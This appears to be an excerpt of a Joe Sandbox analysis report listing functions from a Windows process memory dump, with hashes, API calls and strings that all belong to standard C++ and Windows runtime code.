Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0
API String ID: 3215553584-3137946472
Opcode ID: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
Instruction ID: 35634eae9a2e6fb1fae7d210a35c8b6c429254ab87eb3e8deb42d00fcc76da66
Opcode Fuzzy Hash: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
Instruction Fuzzy Hash: 42E1E733D0D68685F7E0BF2486522BD2B959B72B84F54A031D68DE77D2CE2DA45BA300

Function 00007FF643F53510 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F535B3
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F535DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F5360B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F536AB

Part of subcall function 00007FF643F57260: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F572CB
Part of subcall function 00007FF643F57260: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F57313
Part of subcall function 00007FF643F57260: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F573A3

std::_Facet_Register.LIBCPMT ref: 00007FF643F5368E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F537D6

Strings

ios_base::eofbit set, xrefs: 00007FF643F537F4
ios_base::failbit set, xrefs: 00007FF643F537ED
ios_base::badbit set, xrefs: 00007FF643F537E1

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3702003507-1866435925
Opcode ID: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
Instruction ID: a5a52d2b0e05a0583da81a0fd7dc3784009e38c65687d0c919f19765bdde48d4
Opcode Fuzzy Hash: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
Instruction Fuzzy Hash: 47C13C6260DA8181EBA0EF19E4413AEB7A0FB84B84F548136DA8D97BA6DF3DD445D700

Function 00007FF643F57020 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F57096
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F570DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F57221
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F5723A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F5724D
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F57253

Strings

true, xrefs: 00007FF643F57189
bad locale name, xrefs: 00007FF643F57240
false, xrefs: 00007FF643F57157

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 4121308752-1062449267
Opcode ID: 984ef57e58059ef21608445b4852af3edbd3fda220cd47d4a9535fc0879939a6
Instruction ID: 3e725357ae698f20aa15270ff72670367e0b22faad26f6775740bd81bcee7403
Opcode Fuzzy Hash: 984ef57e58059ef21608445b4852af3edbd3fda220cd47d4a9535fc0879939a6
Instruction Fuzzy Hash: 48614B22B0DB429AFB95FFB094523BC32A5AF40708F045035DE4DB7AE6DE38A456E344

Function 00007FF643F24790 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 330COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F247EF

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F249DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F249E1
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF643F24B01

Strings

: ", xrefs: 00007FF643F24899
", ", xrefs: 00007FF643F248CC

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
String ID: ", "$: "
API String ID: 2261858363-747220369
Opcode ID: 07568a877f46371d82166c9877742fa18b20ba9943c204e1dd04eb17a62a91d1
Instruction ID: ccb6a4d0a4a125d34370a40c2bcbdf0dc3f9a0b3a99d149f872bc3609e97b1d6
Opcode Fuzzy Hash: 07568a877f46371d82166c9877742fa18b20ba9943c204e1dd04eb17a62a91d1
Instruction Fuzzy Hash: 78D1AD72B18B8185EB44FF69E1463AC2362EB44BC8F605032DA5D67BDADF79D881D340

Function 00007FF643F35A60 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F35AF9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35E8E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35E94
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35E9A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35EA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35EAC

Strings

Nothing found, xrefs: 00007FF643F35E4F
replacement , xrefs: 00007FF643F35CB0, 00007FF643F35DC1

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: replacement $Nothing found
API String ID: 4261731725-1856175495
Opcode ID: bc93b126b443df490168a687db7657939f0ea43145bb46f46aefc071cbb7ee2e
Instruction ID: 235655575dd1704c9118004adedbcfa04e7e3ae69f181aff17ad3f4f2f94586f
Opcode Fuzzy Hash: bc93b126b443df490168a687db7657939f0ea43145bb46f46aefc071cbb7ee2e
Instruction Fuzzy Hash: EDC1D162F1CB4685EB90BB65D0023AD6361EB857E8F100632DE6CA7BD9DE3CE481D700

Function 00007FF643F61D60 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF643F61D6D
GetProcAddress.KERNEL32 ref: 00007FF643F61D80
GetProcAddress.KERNEL32 ref: 00007FF643F61D97
GetProcAddress.KERNEL32 ref: 00007FF643F61DAE

Strings

GetTempPath2W, xrefs: 00007FF643F61D9D
GetCurrentPackageId, xrefs: 00007FF643F61D76
GetSystemTimePreciseAsFileTime, xrefs: 00007FF643F61D86
kernel32.dll, xrefs: 00007FF643F61D66

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
Instruction ID: 7805781ac7f998559d5aa34eca254df95dfcdbc03407205a38421bb810cecf61
Opcode Fuzzy Hash: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
Instruction Fuzzy Hash: DAF07F64A1DB07C1EA84BF62BC8607423A4BF48755F444035C82DEB3A0EF7CA199A780

Function 00007FF643F65800 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF643F6585D

Part of subcall function 00007FF643F67BC0: __GetUnwindTryBlock.LIBCMT ref: 00007FF643F67C03
Part of subcall function 00007FF643F67BC0: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF643F67C28

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF643F65935
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF643F65B83
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF643F65C90

Strings

csm, xrefs: 00007FF643F658DE
csm, xrefs: 00007FF643F65877
csm, xrefs: 00007FF643F65958

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
Instruction ID: 5bd16cb237f5e0d4d4e28624590f0afebd6b0ad705f1ec58d07576feb4846efa
Opcode Fuzzy Hash: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
Instruction Fuzzy Hash: F2D19E7290C7418AEBA0BB65D4423AD77A0FB55798F102135DA4DA77D6CF38E486DB00

Function 00007FF643F788F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF643F791C8,?,?,?,?,00007FF643F71FDD,?,?,?,?,00007FF643F5EAF8), ref: 00007FF643F78A6C
GetProcAddress.KERNEL32(?,?,?,00007FF643F791C8,?,?,?,?,00007FF643F71FDD,?,?,?,?,00007FF643F5EAF8), ref: 00007FF643F78A78

Strings

api-ms-, xrefs: 00007FF643F789B6
ext-ms-, xrefs: 00007FF643F789C9

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
Instruction ID: 7a835813c06d91b3cc581e6820120ea2f67a47ac8aea16195d2a2de09748ebda
Opcode Fuzzy Hash: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
Instruction Fuzzy Hash: E4410322B1DA0291FA95FF16A8125B923A1BF49BE0F484535DD0DE77D8EF3CE445A700

Function 00007FF643F75EC0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F75F03
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F762F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7658C

Strings

p, xrefs: 00007FF643F7602D
f, xrefs: 00007FF643F76025
p, xrefs: 00007FF643F75FB5

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
Instruction ID: 701c36bd878d0d5fca114475e18a307c2163b029248aa4709d427347c18bb915
Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
Instruction Fuzzy Hash: E312AE72E0C24386FBE4BF14D1566B976A1FB40754F984536E699A7AC8DF3CE480EB00

Function 00007FF643F23130 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF643F2319B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF643F231E3
_Getctype.LIBCPMT ref: 00007FF643F231FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF643F232B3
_Getwctype.LIBCPMT ref: 00007FF643F23301

Strings

bad locale name, xrefs: 00007FF643F232D6

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1386471777-1405518554
Opcode ID: 846e4c0cd04731f2af0db92d87eb7701ab676c4e89739fc5b87190a254a06fa9
Instruction ID: 2c105c601188324a1693d475ad417d1815d0ec48f53f9785af7899251ea37a73
Opcode Fuzzy Hash: 846e4c0cd04731f2af0db92d87eb7701ab676c4e89739fc5b87190a254a06fa9
Instruction Fuzzy Hash: 03514822A0DB81CAEB54FBA0D4522EC3374AF54748F045135DE8DB7AA6DF38E556A304

Function 00007FF643F6812C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681B1
GetLastError.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681BF
LoadLibraryExW.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681E9
FreeLibrary.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F68257
GetProcAddress.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F68263

Strings

api-ms-, xrefs: 00007FF643F681D1

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
Instruction ID: 895dd8cbe304795c2146237975b033e5a2d72324f0a606ff2a1f5d42fd3e7f20
Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
Instruction Fuzzy Hash: 2A31E722A1EA4291EE91FF12E4025782394BF48BA0F991539DD5DA77E5DF3CE4469300

Function 00007FF643F76F84 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF643F76F93
FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
FlsSetValue.KERNEL32 ref: 00007FF643F76FC9
FlsSetValue.KERNEL32 ref: 00007FF643F76FF6
FlsSetValue.KERNEL32 ref: 00007FF643F77007
FlsSetValue.KERNEL32 ref: 00007FF643F77018
SetLastError.KERNEL32 ref: 00007FF643F77033

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
Instruction ID: bbd36671e99c0ef5f0ba0b00864bc4a6e2569b1a455e99dcc5781bc919ef0132
Opcode Fuzzy Hash: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
Instruction Fuzzy Hash: EC218121B0D64242FAD4B73195570B962525F48BB0F540738E97EEB6D6DF6CF482A200

Function 00007FF643F87F90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF643F87FC1
GetLastError.KERNEL32 ref: 00007FF643F87FCD
CloseHandle.KERNEL32 ref: 00007FF643F87FE5
CreateFileW.KERNEL32 ref: 00007FF643F88010
WriteConsoleW.KERNEL32 ref: 00007FF643F8802F

Strings

CONOUT$, xrefs: 00007FF643F87FF1

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
Instruction ID: 706625eb902b84a5c541124d422b47a7a0d0f91053d356e1f3c0efdb6e9d3c78
Opcode Fuzzy Hash: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
Instruction Fuzzy Hash: 64114F2161CA42C6E790BF52A85672962A0BB88BE8F444234EE5DD7BE4DF7CD9148740

Function 00007FF643F61ED8 Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF643F61F48
MultiByteToWideChar.KERNEL32 ref: 00007FF643F61FE6
LCMapStringEx.KERNEL32 ref: 00007FF643F6204F
LCMapStringEx.KERNEL32 ref: 00007FF643F620A1
LCMapStringEx.KERNEL32 ref: 00007FF643F62146
WideCharToMultiByte.KERNEL32 ref: 00007FF643F621A0

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: ccac95c82485fecce9b0c6ca905e097cdd8d98d264d71d609707ec9c4594a67f
Instruction ID: 2b35adcfa562a8142d1ca382d7239dfc7c7e06ed52e263ec7e35ea0ceef83d8f
Opcode Fuzzy Hash: ccac95c82485fecce9b0c6ca905e097cdd8d98d264d71d609707ec9c4594a67f
Instruction Fuzzy Hash: 8281D232A0CB4296EBA0BF61E44126972E5FF447E8F145631EA5DA7BE8DF3CD4029700

Function 00007FF643F6E4B4 Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E526
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E557
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E597
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E5D9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E60E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6E68B

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
Instruction ID: 476adbc96321a0347c5563fa47b2f166d0d32bf81b387c4e355528924d0b3abf
Opcode Fuzzy Hash: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
Instruction Fuzzy Hash: 0851C63390C68685E7E2BF2495622BD3B919B15B84F489031C6CCD73D6DE2DA80BE701

Function 00007FF643F621D4 Relevance: 9.1, APIs: 6, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF643F62225
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F62244
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F62266
sys_get_time.LIBCPMT ref: 00007FF643F62281
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F622A7
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F622BF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
String ID:
API String ID: 184115430-0
Opcode ID: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
Instruction ID: 254d9330d7f680ac330e447a4c878160cf997869a947fa5a019e02d7e4d3e30c
Opcode Fuzzy Hash: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
Instruction Fuzzy Hash: 7C411932A0C646D6EBA4BF64D44227873A0FB54B48F405135DA4EE76D9DF3CE896EB00

